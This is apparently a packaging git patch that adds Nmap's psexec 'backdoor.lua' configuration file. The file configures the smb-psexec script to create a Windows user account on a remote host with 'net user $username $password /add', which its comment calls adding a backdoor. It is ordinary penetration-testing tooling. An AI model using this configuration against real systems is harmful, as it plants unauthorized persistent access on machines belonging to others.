From 0d47952611198ef6b1163f366dc03922d20b1475 Mon Sep 17 00:00:00 2001 From: Daniel Baumann Date: Wed, 17 Apr 2024 09:42:04 +0200 Subject: Adding upstream version 7.94+git20230807.3be01efb1+dfsg. Signed-off-by: Daniel Baumann --- nselib/data/psexec/backdoor.lua | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 nselib/data/psexec/backdoor.lua (limited to 'nselib/data/psexec/backdoor.lua') diff --git a/nselib/data/psexec/backdoor.lua b/nselib/data/psexec/backdoor.lua new file mode 100644 index 0000000..47f0d23 --- /dev/null +++ b/nselib/data/psexec/backdoor.lua @@ -0,0 +1,27 @@ +---This config file is designed for adding a backdoor to the system. It has a few +-- options by default, only one enabled by default. I suggest +-- +-- Note that none of these modules are included with Nmap by default. + +-- Any variable in the 'config' table in smb-psexec.nse can be overriden in the +-- 'overrides' table. Most of them are not really recommended, such as the host, +-- key, etc. +overrides = {} +--overrides.timeout = 40 + +modules = {} +local mod + +-- TODO: allow the user to specify parameters +--Note: password can't be longer than 14-characters, otherwise the program pauses for +-- a response +mod = {} +mod.upload = false +mod.name = "Adding a user account: $username/$password" +mod.program = "net" +mod.args = "user $username $password /add" +mod.maxtime = 2 +mod.noblank = true +mod.req_args = {'username','password'} +table.insert(modules, mod) + -- cgit v1.2.3